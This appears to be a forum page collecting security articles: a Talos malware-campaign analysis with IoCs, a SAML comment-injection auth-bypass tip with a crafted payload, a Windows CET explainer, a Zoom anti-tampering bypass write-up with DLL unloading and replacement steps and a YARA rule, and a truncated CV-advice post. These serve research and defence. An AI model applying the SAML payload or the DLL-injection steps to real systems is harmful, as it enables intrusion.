Bitcoin, Litecoin, Ethereum, Dash, Monero and Doge-Coin using the following regular expressions: ^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ - Bitcoin ^0x[a-fA-F0-9]{40}$ ^[LM][A-z][1-9A.z]{32}$ ^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ Doge-Coin ^DX[a-z][1-9A-z]{32}$ - Dash - incorrect regular expression ^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$ - Monero The next three payloads are all delivered using a PowerShell technique which downloads an obfuscated binary loader and a byte array in a text format and transforms them into actual binaries. The download is executed by using reflection to load the VisualBasic assembly and then interact with PowerShell using the VisualBasic interaction interface. The script first decompresses and loads a binary loader RunPE, which is then used to load a byte array that contains the binary payload into the process space of a newly created process, explorer.exe, control.exe or notepad.exe for Remcos, DarkVNC and Azorult respectively. All of the payloads are common so we will only briefly describe them. A full analysis is outside of the scope of this post. Downloading and loading RunPE that loads a DarkVNC payload from a byte array AZORult AZORult is an information-stealing bot written in Delphi which connects to a command and control server for so-called "work", which comes in a format of a JSON configuration. The communication with the C2 server is conducted using HTTP with the payload encrypted with a default XOR key 0x0d, 0x0a, 0xc8. Once installed, the bot contacts the server using a POST request. Depending on the version of the bot the server can send a JSON configuration or a set of DLLs to help with stealing information as well as a set of new strings that should be used when matching targeted content for exfiltration. AZORult may attempt to execute one or more of: Steal stored browser passwords Steal cryptocurrency wallets Steal browser history Steal website cookies Steal email credentials Steal Telegram credentials Steal Steam credentials Steal Skype credentials and message history Take victim machine screenshots Execute custom commands Remcos Remcos is a RAT that is offered for sale by a company called Breaking Security. While the company says it will only sell the software for legitimate uses as described in comments in response to the article here and will revoke the licenses for users not following their EULA, the sale of the RAT gives attackers everything they need to establish and run a potentially illegal botnet. Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. It is written in C++ and is relatively small for the rich functionality it contains. The Remcos payload included by the PowerShell loader is the latest version 2.5.0. Talos has created a decoder that allows simple extraction of Remcos configurations. Cisco Umbrella shows an increase in requests for the default C2 domain dfgdgertdvdf.xyz of the sample around the time we found the initial PowerShell loader. DNS activity for the default C2 domain of the Remcos payload. DarkVNC If the user does not have administrative privileges the loader will attempt to load a variant of the DarkVNC trojan, which allows the attacker to remotely access the infected system using the VNC protocol. The C2 server IP address for this sample, 52.15.61.57, is shared with one of the C2 domains specified in the Remcos sample configuration — dfgdgertdvdf.online. This IP address has been actively used in several campaigns from at least mid-December 2019. Indeed, we can see that the DNS activity for this domain corresponds with the activity for the default Remcos C2. DarkVNC attempts to connect to the C2 server using the TCP port 8080, likely to be less suspicious as this is one of the default ports for connections to HTTP proxies. DNS activity for the default C2 domain of the DarkVNC payload. DarkVNC launches a new svchost.exe process and depending on the bitness of the operating system injects a version of a 32- or 64-bit DLL into the svchost.exe process space. The loaded library is extracted from the dropper and it contains remote access functionality. Conclusion In this post, we covered an attack that comes from an actor with a low to medium level of technical ability but quite a clear idea on how to achieve their financial goals. For that they decided to employ a combination of several payloads, ranging from a cryptocurrency miner to well-known information stealer AZORult, remote access tools Remcos and DarkVNC and a clipboard modification trojan. Loaders and payloads used in the AZORult, Remcos et co attack. It is worth remembering that even in special times for cyber criminals, it is just business as usual. Furthermore, as users are worried by the SARS-CoV-2 pandemic and are increasingly working from home the attackers will take advantage and continue to conduct their attacks with a higher probability of remaining unnoticed. Coverage Ways our customers can detect and block this threat are listed below. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically. Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. Email Security can block malicious emails sent by threat actors as part of their campaign. Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. IoCs OSQuery Cisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below: Malware AZORult Registry SHA256 PE Payloads bf2f3f1db2724b10e4a561dec10f423d99700fec61acf0adcbb70e23e4908535 - Remcos payload 42525551155fd6f242a62e3202fa3ce8f514a0f9dbe93dff68dcd46c99eaab06 - AZORult payload 2014c4ca543f1cc946f3b72e8b953f6e99fbd3660edb4b66e2658b8428c0866d - 64 bit XMRigCC bde46cf05034ef3ef392fd36023dff8f1081cfca6f427f6c4894777c090dad81 - DarkVNC main 1c08cf3dcf465a4a90850cd256d29d681c7f618ff7ec94d1d43529ee679f62f3 - DarkVNC 64 bit DLL a02d761cbc0304d1487386f5662a675df3cc6c3ed199e8ed36f738e9843ccc1b - RunPE loader for AZORult, Remcos and DarkVNC 2f1668cce3c8778850e2528496a0cc473edc3f060a1a79b2fe6a9404a5689eea - Clipboard Crypto currency stealer unpacked 9e3a6584c77b67e03965f2ae242009a4c69607ea7b472bec2cba9e6ba9e41352 - 32 bit XMRigCC 29695ca6f5a79a99e5d1159de7c4eb572eb7b442148c98c9b24bdfdbeb89ffc0 - 32 DarkVNC dll aca587dc233dd67f5f265bfda00aec2d4196fde236edfe52ad2e0969932564ed - Clipboard Crypto currency stealer Droppers 598c61da8e0932b910ce686a4ab2fae83fa3f1b2a4292accad33ca91aa9bd256 - Main Executable loader d88ed1679d3741af98e5d2a868e2dcb1fa6fbd7b56b2d479cfa8a33d8c4d8e0b - ISO image distributeted in a ZIP file HTML apps connected with XMRigCC 936fbe1503e8e0bdc44e4243c6b498620bb3fefdcbd8b2ee85316df3312c4114 57f1b71064d8a0dfa677f034914e70ee21e495eaab37323a066fd64c6770ab6c f46a1556004f1da4943fb671e850584448a9521b86ba95c7e6a1564881c48349 b7c545ced7d42410c3865faee3a47617f8e1b77a2365fc35cd2661e571acdc06 PowerShell scripts 2548072a77742e2d5b5ee1d6e9e1ff9d67e02e4c96350e05a68e31213193b35a 14e956f0d9a91c916cf4ea8d1d581b812c54ac95709a49e2368bd22e1f0a32ca - XMRigCC loader cea286c1b346be680abbbabd35273a719d59d5ff8d09a6ef92ecf75689b356c4 - deobfuscated PowerShell Downloader 35b95496b243541d5ad3667f4aabe2ed00066ba8b69b82f10dd1186872ce4be2 - cleanup script ef9fc8a7be0075eb9372a2564273b6c1fffdb4b64f261b90fefea1d65f79b34e - part of XMRigCC support 3dd5fbf31c8489ab02cf3c06a16bca7d4f3e6bbc7c8b30514b5c82b0b7970409 - Main PowerShell loader variant q5fdc4103c9c73f37b65ac3baa3cceae273899f4e319ded826178a9345f6f4a00 - Main PowerShell loader variant URLs hxxp://195[.]123[.]234[.]33/win/checking[.]hta hxxp://195[.]123[.]234[.]33/win/checking[.]ps1 hxxp://195[.]123[.]234[.]33/win/del[.]ps1 hxxp://195[.]123[.]234[.]33/win/update[.]hta hxxp://answerstedhctbek[.]onion hxxp://asq[.]r77vh0[.]pw/win/checking[.]hta hxxp://jthnx5wyvjvzsxtu[.]onion[.]pet hxxp://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta hxxps://answerstedhctbek[.]onion hxxps://answerstedhctbek[.]onion[.]pet hxxps://asq[.]d6shiiwz[.]pw/win/checking[.]ps1 hxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1 hxxps://asq[.]r77vh0[.]pw/win/hssl/r7[.]hta hxxps://darkfailllnkf4vf[.]onion[.]pet hxxps://dreadditevelidot[.]onion[.]pet hxxps://fh[.]fhcwk4q[.]xyz/win/checking[.]ps1 hxxps://fh[.]fhcwk4q[.]xyz/win/hssl/fh[.]hta hxxps://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta hxxps://runionv62ul3roit[.]onion[.]pet hxxps://rutorc6mqdinc4cz[.]onion[.]pet hxxps://thehub7xbw4dc5r2[.]onion[.]pet hxxps://torgatedga35slsu[.]onion hxxps://torgatedga35slsu[.]onion[.]pet hxxps://torrentzwealmisr[.]onion[.]pet hxxps://uj3wazyk5u4hnvtk[.]onion[.]pet hxxps://vkphotofqgmmu63j[.]onion[.]pet hxxps://xmh57jrzrnw6insl[.]onion[.]pet hxxps://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad[.]onion[.]pet hxxps://zzz[.]onion[.]pet hxxp://memedarka[.]xyz/ynvs2/index.php Domains dfgdgertdvdf[.]online - DarkVNC and Remcos C2 dfgdgertdvdf[.]xyz - Remcos C2 memedarka[.]xyz - AZORult C2 Cryptocurrency wallets 855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu - Monero XrchZULVyJPAFro13627cyKdfb6ojerRwv - Dash 3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 - Bitcoin 0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4 - Ethereum LS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY - Litecoin D6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7 - Doge-coin Posted by Vanja Svajcer at 11:04 AM Labels: Clipboard trojan, cryptominers, exfiltration, ISO image, Powershell, remote access tool, Threat Research Sursa: https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html
-
Bounty Tip: How to bypass authorization in SAML ! Shaurya Sharma Apr 3 · 2 min read Security Assertion Markup Language (SAML) is an open XML-based standard for exchanging authentication and authorization data between process parties Vulnerabilities are affected by the decisions of various SSO providers and several libraries using SAML SSO (Single Sign-On). (Security Assertion Markup Language) SAML Using the SAML protocol, users can access many of their cloud applications with just one username and password. Single Sign-On (SSO) is a common technology that allows you to log in to a web application through a “third party” as a third-party web application.It is in this implementation that an error lies that allows an attacker to place a comment inside the username field, the only condition is the presence of a valid username. The problem lies in the comment processing method in the XML markup. When you place a comment code in the username field, a line break occurs. When processing a user name, the preprocessor “cuts off” the value after the comment field and does not take it into account when checking: import xml.etree.ElementTree as et doc = "<NameID>test<!-- comment -->user</NameID>" data = et.fromstring(payload) return data.text # returns 'testuser' The expected value is “testuser”, but after the “break” only the value of “test” will be returned. An example of the implementation of this attack by a user with access to the user@user.com.evil.com account can change SAML to replace NameID with user@user.com during SP processing: <SAMLResponse> <Issuer>https://idp.com/</Issuer> <Assertion ID="_id1234"> <Subject> <NameID>user@user.com<!---->.evil.com</NameID> </Subject> </Assertion> <Signature> <SignedInfo> <CanonicalizationMethod Algorithm="xml-c14n11"/> <Reference URI="#_id1234"/> </SignedInfo> <SignatureValue> some base64 data that represents the signature of the assertion </SignatureValue> </Signature> </SAMLResponse> The following solutions are subject to this attack: OneLogin — python-saml — CVE-2017–11427 OneLogin — ruby-saml — CVE-2017–11428 Clever — saml2-js — CVE-2017–11429 OmniAuth-SAML — CVE-2017–11430 Shibboleth — CVE-2018–0489 Duo Network Gateway — CVE-2018–7340 It is worth noting that the attack does not work against accounts protected by two-factor authentication (which is included in ~ 10% of users according to Google statistics). To prevent such attacks, it is necessary to update the libraries used, disable the public registration of user accounts in important networks, or abandon the canonicalization algorithm that does not skip comments. #HappyHunting #BugBountyTips Sursa: https://medium.com/bugbountywriteup/bounty-tip-how-to-bypass-authorization-in-saml-f7577a6541c4
-
Windows 10 security: How the shadow stack will help to keep the hackers at bay by Mary Branscombe in Security on April 3, 2020, 2:54 AM PST How Windows will use Intel's Control-flow Enforcement Technology to block whole classes of common attacks, now it's finally reaching the market. Fixing the individual bugs behind the vulnerabilities that hackers use to attack systems is important, but it's much more effective to block the techniques attackers use to exploit those vulnerabilities and remove an entire class of exploits -- or at least make them more expensive and time-consuming to create. Return-oriented programming (ROP) has been a very common technique that's particularly hard to block, because instead of trying to inject their own code into running processes (something operating systems and browsers have been adding defences against), attackers look for small chunks of the legitimate code that's already in memory that contain 'returns' -- where the code jumps forward to a new routine or back to the main thread. More about Windows Microsoft Teams: A cheat sheet (free PDF) 20 pro tips to make Windows 10 work the way you want (free PDF) Windows 10 run commands you should know (but probably forgot) Windows 10 PowerToys: A cheat sheet "With ROP, I can't create new code; I can only jump around to different pieces of code and try to string that together into a payload," Dave Weston, director of OS security at Microsoft told TechRepublic. If the legitimate code has a memory safety bug like a buffer overflow, corrupting those pointers in memory means the system starts running the attacker's own code instead of going back to the address in the program's call stack. Microsoft has been working on ways to stop attackers hijacking the flow of control in programs like this since around 2012. Windows has added multiple levels of protection, starting with signing important code (Code Integrity Guard, or CIG) and blocking runtime code generation first in the browser and then in VMs and the kernel (Arbitrary Code Guard, or ACG). "The goal there is to prevent the attacker from loading a binary that Microsoft or one of our third parties didn't sign; even if they are able to exploit the process and get memory corruption in the process, they can't inject shellcode or other constructs," Weston explained. That defence was effective enough to push attackers to use ROP, so the next step was trying to protect the flow of control within the program. Control flow integrity arrived in Windows 8.1 as Control Flow Guard (CFG) This blocks forward control flow attacks (where the code jumps out or makes a call and attackers try to send it to the wrong place). "At compile time, we take a record of all the indirect transfers or jumps or calls that the software developer intends the code to make, and that map is passed to the kernel when you load the binary and it's enforced when the code runs," Weston said. If an attacker does manage to send the code to an address that isn't on the map, the process is terminated: an infected app will crash, but it won't run the malicious code. CFG is the reason that several key zero-day attacks on Windows 7 didn't affect Windows 10. But, as Weston noted, 2015 is a long time ago in security terms, and CFG only addresses part of the problem. "Attackers have actually started to corrupt the stack, injecting their ROP frames or their malicious instruction sets." By interfering with the execution flow when it returns to the main thread, rather than when it jumps forward, they can bypass CFG and execute their own code when the thread should go back. Call and return It's not that Microsoft didn't know that could happen; it's just harder to protect against and the best option is to do it in hardware, with a special register in the CPU that keeps a copy of the return address where it can't be tampered with. When the chunk of code with the return instruction runs, it can compare the address on the call stack in memory with the address on the 'shadow' stack stored on the processor to check that it hasn't been tampered with. Designing new CPU instructions takes time, and even once those ship it takes a while before people buy new hardware, so Microsoft did attempt to create a shadow stack in software. (This was far from the first attempt to create a shadow stack; there's one implemented in CLANG that Chrome used for a time.) Unusually, the approach which would have become Return Flow Guard was designed not by the usual software engineers but by the Windows red team -- the group that attacks internal and insider builds of Windows to look for vulnerabilities. But when the same team looked at how they could attack their own design, they found a race condition that meant some apps weren't protected and decided not to ship it at all. "The challenge with doing a shadow stack in software is that you have two choices: you can try to hide it, or you can try to put it in a place where the attacker can't write, and ultimately that comes down to if you can modify the page table or if you can locate it in memory if things go awry," Weston explained. "We attempted to hide it somewhere in 64-bit memory by wrapping it in guard pages, so if someone did like an iterative search through memory they would hit a guard space first and crash the process before finding the shadow stack." But on high-performance multi-threaded apps, attackers could sometimes make the kernel skip over the check to see if the return address matched the address on the shadow stack. "When we have to do it in software, we have to introduce 'no ops'; when you're entering and exiting the function, we pad them with blanks and so people are able to massage the memory, people are able to massage the race conditions of the system and skip the checks completely," Hari Pulapaka, principal group program manager of the Windows kernel team, explained. There's no race condition when the shadow stack is stored in hardware, so the checks don't get skipped. CET (Control-flow Enforcement Technology) completes the set of four protections against ROP (Return-oriented programming) that Microsoft has been working on for many years. Image: Microsoft Microsoft and Intel worked together on a design called Control-flow Enforcement Technology (CET) several years ago, which adds the new Shadow Stack Pointer (SSP) register and modifies the standard CPU call and return instructions to store a copy of the return address and compare it to the one in memory -- so most programs won't need any changes for compatibility. If the two addresses don't match, which means the stack has been interfered with, the code will stop running. "The shadow page table is assigned in a place that most processes or even the kernel cannot access, and this is supported by a new page table attribute that is not even exposed right now and people can't query it either," Pulapaka said. "The idea is that you will not be able to see that it exists, and you will not be able to touch it -- and if you try to touch it, the kernel doesn't allow it to allow any arbitrary process to touch it." SEE: 20 pro tips to make Windows 10 work the way you want (free PDF) (TechRepublic) CET also includes some forward call protection: indirect branch tracking does a similar check to CFG but in hardware. The CET specification was first released in 2016 and for compatibility, silicon released since then has had a non-functional version of the instruction that marks indirect branch addresses as safe. Intel confirmed to us that CET will be included in Tiger Lake CPUs this year, and in the next generation of Xeon for servers. AMD didn't give a date, but told us it will have the equivalent of CET soon. Arm is taking a different approach, using signed pointers. Compatible and secure Microsoft has already started building support into Windows 10, starting with 1903 and completing it in the upcoming 2004 release, so it's been showing up in fast ring insider builds. It's not enabled because the hardware isn't widely available yet, but it's there to test compatibility, Pulapaka explained. "When an insider build has all these checks going on inside the kernel, it gives us confidence we haven't broken anything and we haven't caused any bugs." To avoid compatibility worries with third-party software, CET stack protection will initially be opt-in on Windows. Developers do that by setting an attribute on an app or a DLL with a linker flag to mark it as CET-compatible. This has been done for all Windows code and libraries and, Pulapaka explained, "if somebody tries to attack Windows code and we trip the CET tripwire, we will bring down the process." If they don't set that bit, CET won't kick in, and even if developers set the bit for their own code, if they call a third-party framework or library that doesn't have the CET flag set and it crashes because it fails the CET address check, Windows won't stop the original application. "We're being a little conservative to avoid breaking apps," Pulapaka said. But Windows could also run in a strict mode. "If an app says it's CET-compatible even if the third-party DLL it loads is not CET-compatible, in that mode we would still do all the checks on that DLL and crash the process if somebody tries to attack that process." Microsoft hasn't yet decided how that mode would be applied because hardware isn't available for developers and enterprises to test applications on. "We would want to provide flexibility to everybody, so we would want the app to own the policy decision, we would want the enterprise to own the policy decision and we would want Microsoft to own the policy decision as well," said Pulapaka. "I think it is too early for us to say what we would turn on or off or force by default, because we don't yet have the hardware." Pulapaka expects compatibility problems with CET to be rare, but given the size of the Windows ecosystem some apps may run into problems. Those are most likely to be sophisticated tools like debuggers, JIT code generation tools, DRM, code obfuscators or anti-cheat engines for games, that rely on low-level assembly code. "If they have some weird code that tries to mess with the stack pointers, they could get tripped up. That's why we want to start with this more conservative approach and see how it goes; ninety-nine percent of the software world would probably not need to worry about whether their apps need some extra special testing with CET." When developers and enterprises have the right hardware to test on and do want to adopt CET, they can set the linker file in Visual Studio and use the same binary analysis tool that Microsoft uses to scan each Windows build to make sure that the CET flag is set on all code. Protecting code flow in hardware is the best option for security, and it ought to be better for performance than adding checks in Windows. Until Tiger Lake is available, it's impossible to give real figures but "it will certainly be way better than doing it in software because by definition, doing it hardware is much faster," Pulapaka told TechRepublic. That's important because the shadow stack is an important protection that we've been waiting several years for, to complete the list of Microsoft's four code protections. "These things are only truly effective when they're combined," Weston pointed out, "but when those protections are combined, we mitigate most of the in-the-wild techniques we see today. When it comes to the x86 landscape, we think CET is possibly the most important mitigation that's come online for memory corruption and zero day exploits, in the last several years." As always, improving protection in one area pushes attackers to switch techniques -- but this is still a big step forward. "Data corruption is emerging as the future path for attackers: we know internally that you can write an exploit that bypasses all four of these guards with pure data corruption," Weston said. "That doesn't mean CET isn't incredibly valuable, because that's a bit like open heart surgery and is going to be really disruptive for attackers, but we're already moving towards a post four-guards world where we've started to think about the next set of challenges around data corruption." Sursa: https://www.techrepublic.com/article/windows-10-security-how-the-shadow-stack-will-help-to-keep-the-hackers-at-bay/
-
Tampering with Zoom's Anti-Tampering Library ● 03 Apr 2020 Introduction This quick blog post highlights some of the flaws found in the Zoom application when attempting to do integrity checking, these checks verify that the DLLs inside the folder are signed by Zoom and also that no 3rd party DLLs are loaded at runtime. We can trivially disable this DLL, by replacing it with our own or simply unloading it from the process. This post highlights how we can bypass Zoom’s anti-tampering detection, which aims to stop DLLs from being loaded or existing ones modified. The functionality is all implemented by Zoom themselves within a DLL named DllSafeCheck.dll. I have also included a YARA rule at the end of this blog post, in case this technique is used by an advisory in the future. I’ll cover these flaws: The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL. Ironically while all the DLLs checked by the anti-tampering DLL MUST have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLLs integrity or signing status are NOT checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL. Zoom Client Zoom is entirely programmed in C++ and makes heavy use of the Windows API. The executable and the DLLs that are used are installed to %APPDATA%\Zoom\bin and is completely writeable. All of the executables that are used are signed by Zoom themselves, as we can see below when extracting the certificate. PS AppData\Roaming\Zoom\bin_00> Get-PfxCertificate util.dll Thumbprint Subject ---------- ------- 0F9ADA46756C17EFFFD467D10654E2A766566CB3 CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Pr... Most of the functionality within Zoom resides within the DLLs. Below, we can see the DLLs which are included within the export table. Take notice of the DllSafeCheck.dll; the is the library we will be analysing. Looking further at the use of DllSafeCheck.dll, we can see that it exports a function named HackCheck. If we then cross-reference the calls to this function using our favourite disassembler, IDA in this instance, we can see that it is called at the entry point of the program within WinMain before any other operations are completed. Below, we can see the function prologue and the immediate call to HackCheck. DllSafeCheck.dll As abovementioned, the Zoom client will call the HackCheck function (which is the only export from the DLL, apart from DllMain), upon execution. Two events are created to detect the loading and unloading of the DLL, by resolving LdrUnregisterDllNotification and LdrRegisterDllNotification to register it. To start, the export first starts by verifying that it is not running on an old version of Windows, using a mixture of VerSetConditionMask and VerifyVersionInfoW. After the Windows version has passed these checks, it will continue execution. It then will gather the Windows process token information through the usual means of getting a handle for the current process, then calling GetTokenInformation. This data is then saved for further use. A path to Zoom’s %APPDATA% folder is then constructed, and a log file named dllsafecheck.txt is created. A thread is then created, which waits for log events to be sent to it. Below, we can see the creation of this file. We then get to the core functionality of the DLL, which is scanning the modules which are loaded in the current process and making sure that they’re signed by Zoom. It will gather a list of the modules, and then check to see if they are signed, below, we can see the enumeration of the certificate chain to check against the hardcoded Zoom Video Communications, Inc. string. if ( v10->csCertChain ) { do { v12 = WTHelperGetProvCertFromChain(v10, v11); if ( !v12 ) break; v13 = v12->pCert; if ( v13 ) { v15 = CertGetNameStringW(v13, 4u, 0, 0, 0, 0); // get alloc len v16 = v15; if ( v15 ) { v14 = HeapAlloc(NULL, 0, 2 * v15); if ( v14 ) { v20 = 0; do { v14[v20++] = 0; } while (v20 < (2 * v15)); if (!CertGetNameStringW(v13, 4u, 0, 0, (LPWSTR)v14, v16)) { HeapFree(NULL, 0, v14); v14 = 0; } } v10 = v26; } else { v14 = 0; } } else { v14 = 0; } if ( !v25 ) v25 = L"Zoom Video Communications, Inc."; If the executable is not signed by Zoom, it will prompt the user to ask if it wants it to be run in the process. Trivial to unload from process Ironically while all the DLLs checked by the anti-tampering DLL must have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLLs integrity or signing status are not checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL. An immediate issue is that this DLL can be trivially unloaded, rendering the anti-tampering mechanism null and void. The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL. One possible fix for this would be to perform GetModuleHandleExA, and passing in the GET_MODULE_HANDLE_EX_FLAG_PIN flag. This ensures that the module stays loaded within the process until it terminates, rendering FreeLibrary calls useless. HMODULE hSafeCheck = NULL; if (GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_PIN, "DllSafeCheck.dll", &hSafeCheck)) { // Loaded module successfully } We can unload it using the traditional, and well-documented method of: 1) HANDLE of Zoom process using OpenProcess 2) Enumerate the loaded modules in the process, using EnumProcessModules, and find a handle to DllSafeCheck.dll 3) Resolve the address of “FreeLibrary” using GetProcAddress 4) Create a thread in the process using CreateRemoteThread, with the starting routine as the FreeLibrary address, and the parameter as the handle to DllSafeCheck. 5) The anti-tampering DLL is now unloaded 6) We can now inject any DLL we want I’ve created simple POC (basic CreateRemoteThread DLL injection, nothing fancy) for unloading the anti-tampering DLL and injecting our own. You can contact me at me@syscall.party if you want to see it. Anti-tampering DLL can be replaced on disk When loading the DLL, Zoom does not check the signature of the integrity of the file. I’m not sure why this is not checked at all, considering all of the checks which are done in the DllSafecheck DLL regarding executable signature vertification. This remains a mystery. A threat actor could leverage this to enable their unsigned, non-Zoom DLL to be loaded into the context of a signed executable as a host for their malicious code. The folder which Zoom resides in is writeable, which also contributes to this attack. A simple DLL named DllSafeCheck.dll can be compiled implementing the HackCheck export. For clarity, the malicious DLL which is used is not signed. We can see the result of querying the executable signature below. PS AppData\Roaming\Zoom\bin_00> Get-AuthenticodeSignature DllSafeCheck.dll SignerCertificate Status Path ----------------- ------ ---- NotSigned DllSafeCheck.dll The following code was used for this PoC: VOID __declspec(dllexport) CheckHack() { MessageBox(NULL, L"LloydLabs", L"Oops!", MB_APPLMODAL); } Here, we can see the the alert when loading Zoom. How could a threat actor realistically exploit this? A malicious DLL could be bundled with Zoom, and sent to a victim - this would result in the payload (e.g. Cobalt Strike), being executed under the context of the Zoom process. A threat actor could also abuse these issues to persist both across reboot and in memory on a target system, this is a much cleaner approach compared to the alternatives of registering some startup event. YARA rule import "pe" rule Zoom_Plant { meta: date = "2020-04-03" author = "LloydLabs" url = "https://blog.syscall.party" condition: pe.characteristics & pe.DLL and pe.exports("HackCheck") and pe.number_of_exports == 1 and (pe.issuer contains "Zoom Video Communications, Inc.") } Conclusion Thank you for reading this brief blog, if you wish to contact me I can be emailed at: me@syscall.party - I’m a 3rd year undergraduate student, and open to opportunities and collaboration. Cheers! Sursa: https://blog.syscall.party/post/tampering-with-zooms-anti-tampering-library/
-
2020-04-04: How to document your knowledge (in a CV/resume) cv:resume:career From time to time I am asked to look at someone’s CV/resume and to suggest improvements. Usually, apart from o bunch of tips/comments, I give that person a link to a 10-year old blogpost of mine which enumerates things a programing/hacking enthusiast might have done and could include on their resume - some of them are obvious, others less so. Originally the blogpost was published in Polish; however, a few days ago I had it translated, I've updated it, and here we are - enjoy! Here’s the usual problem: how to document the knowledge acquired on your own? In the case of courses, studies, etc., that’s simple – we usually obtain a paper confirming the acquired qualifications: after graduation, it will be a graduation certificate, after a professional examination, it will be a technician diploma, after graduating from an university it will be a master's degree, engineering degree, etc., after completing a course or training, it will probably be a type of a certificate of completion. It goes without saying that we put the above certificates into our CVs, either in the Education section or in the section for “additional qualifications/skills”. However, the situation is not as clear if we acquired the knowledge ourselves. But it’s only seemingly so. The whole thing, in my opinion, comes down to publishing what you are doing - i.e. let's give the future employer a chance to see that we have actually gained some experience, even if we might have not been employed anywhere before (or at least not in these fields). What can be published if we learn programming, reverse engineering, or hacking/security? (If you still have some time before looking for a job, you can also treat this post as a list of things that could be done to strengthen your CV/resume) Apps, libraries, or smaller snippets of code (e.g. as a GitHub link). This point is both valid for project which were 100% done and have actual users, as well as for smaller apps that we wrote mostly for fun, and then got bored half way through implementation. However, do include only properly written code - neat, with comments, ideally even with accompanying documentation. And, to state the obvious, I wouldn't recommend including (or even creating in the first place) anything similar to “a new trojan stealing passwords from this-or-that-MMORPG and this-or-that-social-network, undetectable by anything on VirusTotal” – it can ruin one's chances with a lot of companies (e.g. ones from the antivirus industry). Articles or tutorials (published on our own website, on various sites, or in the industry press [thx Mariusz]). There are two advantages to publishing articles: firstly, we pass the knowledge on and give back to the larger community; and secondly, we prove that we have actually learned something. But remember that this is a double-edged sword! If the article is derivative (i.e. there are already 150 articles in our language on this topic), unreliable (full of errors), too chaotic, on a topic we will be ashamed of later (e.g. “how to steal a friend’s password to their mailbox”), or, oh the horror, is plagiarized, then we will get the exact opposite effect to the intended one. Lectures, talks, videos. This point is closely related to the previous one – just the medium is different. If we feel confident in a given topic (and actually have the grounds to be that) as well as with public presentations, we can try recording a set of training/tutorial videos or speaking at a conference. There are quite a few conferences out there – they are diverse in their topics, reach (local ones vs international ones) and in the level of talk (there are some that only accept original research, and quite a few where you can talk about anything interesting). Of course, in the event of an appearance (or recording), we need to ensure the quality of the lectures – both in technical content and making sure it’s interesting (counted in the number of people yawning, falling asleep or leaving the room). Participation in conferences. If we don't particularly see ourselves as a speaker, it's still worth to attend conferences. There are many new things we can learn, and we can say that we participated in such a conference. Networking is also important! Run a technical blog. By definition blogposts are a simpler and less refined medium than articles – therefore they can also be more diverse in topics. We can use blogs to publish updates on our current projects and endeavours, write about curious and interesting details we've seen, about problems we've encountered – how did we solve them, and also about new things we've learnt. As in previous cases, do care about the quality of the postings – try to write in an interesting way, care about details and the language, and avoid posing as an expert in areas new to you (especially when writing about new things you've learnt). Obviously, avoid publishing (and doing) things which could negatively affect your career (e.g. "How I stole 1000 passwords and sold them to the highest bidder"). Publish vulnerability advisories and case studies. Typically, when you find a vulnerability, an advisory and PoC exploit are written, sent to the vendor/maintainer, and eventually published – this is pretty much the norm in the industry. If you plan to look for a job as a pentester or security researcher, it is worth showing that you can actually find something. Also carefully consider the way you approach the process beforehand – there's an age-old dilemma whether to go for Full-Disclosure or Vendor-Coordinated-Disclosure (aka Responsible-Disclosure); the current norm seems to be some form of the latter (e.g. 90-day policy). All of the above things can be put in the CV. Personally, I have added sections to my CV like “Publications, lectures, projects worth mentioning, research worth mentioning” and I put there everything that I think is worth mentioning (running a blog is an exception here, and I personally put it in the 'interests' section). Over time, it will probably be a lot, so it is worth ignoring what is less interesting - the CV is, after all, to be quite concise and some say it's good if it does not exceed two pages (depends on the country / YMMV). It is important not to put anything in your CV that you don't really know. Job interviews at good companies are often designed to check whether what a person has written in the CV is actually true, so we can be sure we will be thoroughly grilled about everything that is written there. But if we've actually worked with what we put there, that shouldn't be too difficult. To look at it from another perspective: this is an extremely favorable situation – because not only do we know some of the questions up front – we've already learnt how to answer them! The first item on the above list (the one about publishing one's projects) actually extends even further – regardless if we decided to publish any of our projects, we need to have some code ready to show a potential employer if asked (in my personal experience this was a typical request I've received until I've reached senior level). Thankfully, while learning programming (a process that never actually stop) it's pretty typical to 